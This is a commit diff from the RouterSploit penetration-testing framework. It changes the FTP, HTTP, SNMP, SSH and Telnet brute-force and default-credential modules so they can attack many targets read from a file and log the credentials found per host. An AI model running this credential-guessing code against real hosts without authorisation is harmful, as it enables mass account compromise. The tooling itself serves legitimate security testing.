Skip to content

R
routersploit
Commit 43490edd by Marcin Bury
Options

Adding support for targets from file.

parent 47c18768
Showing with 113 additions and 69 deletions
routersploit/modules/creds/ftp_bruteforce.py
......@@ -12,6 +12,7 @@ from routersploit import (
print_success,
print_table,
boolify,
multi,
)
......@@ -27,7 +28,7 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target IP address')
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
port = exploits.Option(21, 'Target port')
threads = exploits.Option(8, 'Number of threads')
......@@ -39,6 +40,10 @@ class Exploit(exploits.Exploit):
def run(self):
self.credentials = []
self.attack()
@multi
def attack(self):
ftp = ftplib.FTP()
try:
ftp.connect(self.target, port=int(self.port), timeout=10)
......@@ -66,7 +71,7 @@ class Exploit(exploits.Exploit):
if len(self.credentials):
print_success("Credentials found!")
headers = ("Login", "Password")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
......@@ -103,10 +108,10 @@ class Exploit(exploits.Exploit):
ftp.login(user, password)
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
print_success("Target: {}:{} {}: Authentication succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
except:
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
ftp.close()
......
routersploit/modules/creds/ftp_default.py
......@@ -11,6 +11,7 @@ from routersploit import (
print_success,
print_table,
boolify,
multi,
)
......@@ -26,7 +27,7 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target IP address')
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
port = exploits.Option(21, 'Target port')
threads = exploits.Option(8, 'Numbers of threads')
......@@ -37,6 +38,10 @@ class Exploit(exploits.Exploit):
def run(self):
self.credentials = []
self.attack()
@multi
def attack(self):
ftp = ftplib.FTP()
try:
ftp.connect(self.target, port=int(self.port), timeout=10)
......@@ -58,7 +63,7 @@ class Exploit(exploits.Exploit):
if len(self.credentials):
print_success("Credentials found!")
headers = ("Login", "Password")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
......@@ -95,10 +100,10 @@ class Exploit(exploits.Exploit):
ftp.login(user, password)
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
except:
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
ftp.close()
......
routersploit/modules/creds/http_basic_bruteforce.py
import threading
import requests
import itertools
from routersploit import (
......@@ -11,7 +10,9 @@ from routersploit import (
print_success,
print_table,
sanitize_url,
http_request,
boolify,
multi,
)
......@@ -27,7 +28,7 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
port = exploits.Option(80, 'Target port')
threads = exploits.Option(8, 'Numbers of threads')
......@@ -40,18 +41,17 @@ class Exploit(exploits.Exploit):
def run(self):
self.credentials = []
self.attack()
@multi
def attack(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
try:
r = requests.get(url, verify=False)
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
print_error("Invalid URL format: %s" % url)
return
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
response = http_request(method="GET", url=url)
if response is None:
return
if r.status_code != 401:
if response.status_code != 401:
print_status("Target is not protected by Basic Auth")
return
......@@ -71,7 +71,7 @@ class Exploit(exploits.Exploit):
if len(self.credentials):
print_success("Credentials found!")
headers = ("Login", "Password")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
......@@ -88,14 +88,15 @@ class Exploit(exploits.Exploit):
user, password = data.next()
user = user.encode('utf-8').strip()
password = password.encode('utf-8').strip()
r = requests.get(url, auth=(user, password), verify=False)
if r.status_code != 401:
response = http_request(method="GET", url=url, auth=(user, password))
if response.status_code != 401:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
else:
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
except StopIteration:
break
......
routersploit/modules/creds/http_basic_default.py
import threading
import requests
from routersploit import (
exploits,
......@@ -12,7 +11,7 @@ from routersploit import (
sanitize_url,
boolify,
http_request,
multi
multi,
)
......@@ -28,7 +27,7 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
port = exploits.Option(80, 'Target port')
threads = exploits.Option(8, 'Number of threads')
defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
......@@ -82,14 +81,15 @@ class Exploit(exploits.Exploit):
line = data.next().split(":")
user = line[0].encode('utf-8').strip()
password = line[1].encode('utf-8').strip()
r = requests.get(url, auth=(user, password), verify=False)
if r.status_code != 401:
response = http_request(method="GET", url=url, auth=(user, password))
if response.status_code != 401:
running.clear()
print_success("Target: {}:{} {}: Authentication succeed!".format(self.target, self.port, name), user, password, verbose=module_verbosity)
print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
else:
print_error(name, "Target: {}:{} Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, user, password), verbose=module_verbosity)
print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
except StopIteration:
break
......
routersploit/modules/creds/http_form_bruteforce.py
......@@ -13,6 +13,7 @@ from routersploit import (
print_table,
sanitize_url,
boolify,
multi,
)
......@@ -28,7 +29,7 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
port = exploits.Option(80, 'Target port')
threads = exploits.Option(8, 'Number of threads')
usernames = exploits.Option('admin', 'Username or file with usernames (file://)')
......@@ -43,6 +44,10 @@ class Exploit(exploits.Exploit):
def run(self):
self.credentials = []
self.attack()
@multi
def attack(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
try:
......@@ -85,7 +90,7 @@ class Exploit(exploits.Exploit):
if len(self.credentials):
print_success("Credentials found!")
headers = ("Login", "Password")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
......@@ -155,10 +160,10 @@ class Exploit(exploits.Exploit):
if l < self.invalid["min"] or l > self.invalid["max"]:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
else:
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
print_error(name, "Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
except StopIteration:
break
......
routersploit/modules/creds/http_form_default.py
......@@ -12,6 +12,7 @@ from routersploit import (
print_table,
sanitize_url,
boolify,
multi,
)
......@@ -27,7 +28,7 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
port = exploits.Option(80, 'Target port')
threads = exploits.Option(8, 'Number of threads')
defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
......@@ -41,6 +42,10 @@ class Exploit(exploits.Exploit):
def run(self):
self.credentials = []
self.attack()
@multi
def attack(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
try:
......@@ -78,7 +83,7 @@ class Exploit(exploits.Exploit):
if len(self.credentials):
print_success("Credentials found!")
headers = ("Login", "Password")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
......@@ -148,10 +153,10 @@ class Exploit(exploits.Exploit):
if l < self.invalid["min"] or l > self.invalid["max"]:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
else:
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
except StopIteration:
break
......
routersploit/modules/creds/snmp_bruteforce.py
......@@ -10,6 +10,7 @@ from routersploit import (
print_success,
print_table,
boolify,
multi,
)
......@@ -23,7 +24,7 @@ class Exploit(exploits.Exploit):
'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
}
target = exploits.Option('', 'Target IP address')
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
port = exploits.Option(161, 'Target port')
threads = exploits.Option(8, 'Number of threads')
snmp = exploits.Option(wordlists.snmp, 'Community string or file with community strings (file://)')
......@@ -32,7 +33,11 @@ class Exploit(exploits.Exploit):
strings = []
def run(self):
self.strings= []
self.strings = []
self.attack()
@multi
def attack(self):
# todo: check if service is up
......@@ -46,7 +51,7 @@ class Exploit(exploits.Exploit):
if len(self.strings):
print_success("Credentials found!")
headers = tuple(["Community Strings"])
headers = ("Target", "Port", "Community Strings")
print_table(headers, *self.strings)
else:
print_error("Valid community strings not found")
......@@ -67,10 +72,10 @@ class Exploit(exploits.Exploit):
if res[0] is not None:
running.clear()
print_success("{}: Valid community string found!".format(name), string, verbose=module_verbosity)
self.strings.append(tuple([string]))
print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
self.strings.append((self.target, self.port, string))
else:
print_error("{}: Invalid community string.".format(name), string, verbose=module_verbosity)
print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
except StopIteration:
break
......
routersploit/modules/creds/ssh_bruteforce.py
......@@ -12,6 +12,7 @@ from routersploit import (
print_success,
print_table,
boolify,
multi,
)
......@@ -25,7 +26,7 @@ class Exploit(exploits.Exploit):
'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
}
target = exploits.Option('', 'Target IP address')
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
port = exploits.Option(22, 'Target port')
threads = exploits.Option(8, 'Number of threads')
......@@ -37,6 +38,10 @@ class Exploit(exploits.Exploit):
def run(self):
self.credentials = []
self.attack()
@multi
def attack(self):
ssh = paramiko.SSHClient()
try:
......@@ -65,7 +70,7 @@ class Exploit(exploits.Exploit):
if len(self.credentials):
print_success("Credentials found!")
headers = ("Login", "Password")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
......@@ -88,12 +93,12 @@ class Exploit(exploits.Exploit):
break
except paramiko.ssh_exception.SSHException as err:
ssh.close()
print_error(name, err, "Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
print_error("Target: {}:{} {}: {} Username: '{}' Password: '{}'".format(self.target, self.port, name, err, user, password), verbose=module_verbosity)
else:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
print_success("Target: {}:{} {} Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((user, password))
self.credentials.append((self.target, self.port, user, password))
print_status(name, 'thread is terminated.', verbose=module_verbosity)
routersploit/modules/creds/ssh_default.py
......@@ -11,6 +11,7 @@ from routersploit import (
print_success,
print_table,
boolify,
multi,
)
......@@ -26,7 +27,7 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target IP address')
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
port = exploits.Option(22, 'Target port')
threads = exploits.Option(8, 'Numbers of threads')
defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
......@@ -36,6 +37,10 @@ class Exploit(exploits.Exploit):
def run(self):
self.credentials = []
self.attack()
@multi
def attack(self):
ssh = paramiko.SSHClient()
try:
......@@ -59,7 +64,7 @@ class Exploit(exploits.Exploit):
if len(self.credentials):
print_success("Credentials found!")
headers = ("Login", "Password")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
......@@ -83,12 +88,12 @@ class Exploit(exploits.Exploit):
except paramiko.ssh_exception.SSHException as err:
ssh.close()
print_error(name, err, "Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
print_error("Target: {}:{} {}: {} Username: '{}' Password: '{}'".format(self.target, self.port, name, err, user, password), verbose=module_verbosity)
else:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
print_success("Target: {}:{} {} Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((user, password))
self.credentials.append((self.target, self.port, user, password))
print_status(name, 'process is terminated.', verbose=module_verbosity)
routersploit/modules/creds/telnet_bruteforce.py
......@@ -11,6 +11,7 @@ from routersploit import (
print_success,
print_table,
boolify,
multi,
)
......@@ -24,7 +25,7 @@ class Exploit(exploits.Exploit):
'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
}
target = exploits.Option('', 'Target IP address')
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
port = exploits.Option(23, 'Target port')
threads = exploits.Option(8, 'Number of threads')
......@@ -36,7 +37,10 @@ class Exploit(exploits.Exploit):
def run(self):
self.credentials = []
self.attack()
@multi
def attack(self):
try:
tn = telnetlib.Telnet(self.target, self.port)
tn.expect(["login: ", "Login: "], 5)
......@@ -60,7 +64,7 @@ class Exploit(exploits.Exploit):
if len(self.credentials):
print_success("Credentials found!")
headers = ("Login", "Password")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
......@@ -93,12 +97,12 @@ class Exploit(exploits.Exploit):
tn.close()
if i != -1:
print_error(name, "Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
else:
if any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500: # big banner e.g. mikrotik
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
tn.close()
break
except EOFError:
......
routersploit/modules/creds/telnet_default.py
......@@ -10,6 +10,7 @@ from routersploit import (
print_success,
print_table,
boolify,
multi,
)
......@@ -25,7 +26,7 @@ class Exploit(exploits.Exploit):
]
}
target = exploits.Option('', 'Target IP address')
target = exploits.Option('', 'Target IP address or file with target:port (file://)')
port = exploits.Option(23, 'Target port')
threads = exploits.Option(8, 'Numbers of threads')
......@@ -36,7 +37,10 @@ class Exploit(exploits.Exploit):
def run(self):
self.credentials = []
self.attack()
@multi
def attack(self):
try:
tn = telnetlib.Telnet(self.target, self.port)
tn.expect(["login: ", "Login: "], 5)
......@@ -55,7 +59,7 @@ class Exploit(exploits.Exploit):
if len(self.credentials):
print_success("Credentials found!")
headers = ("Login", "Password")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
......@@ -87,12 +91,12 @@ class Exploit(exploits.Exploit):
tn.close()
if i != -1:
print_error(name, "Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
else:
if any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500: # big banner e.g. mikrotik
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
tn.close()
break
except EOFError:
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment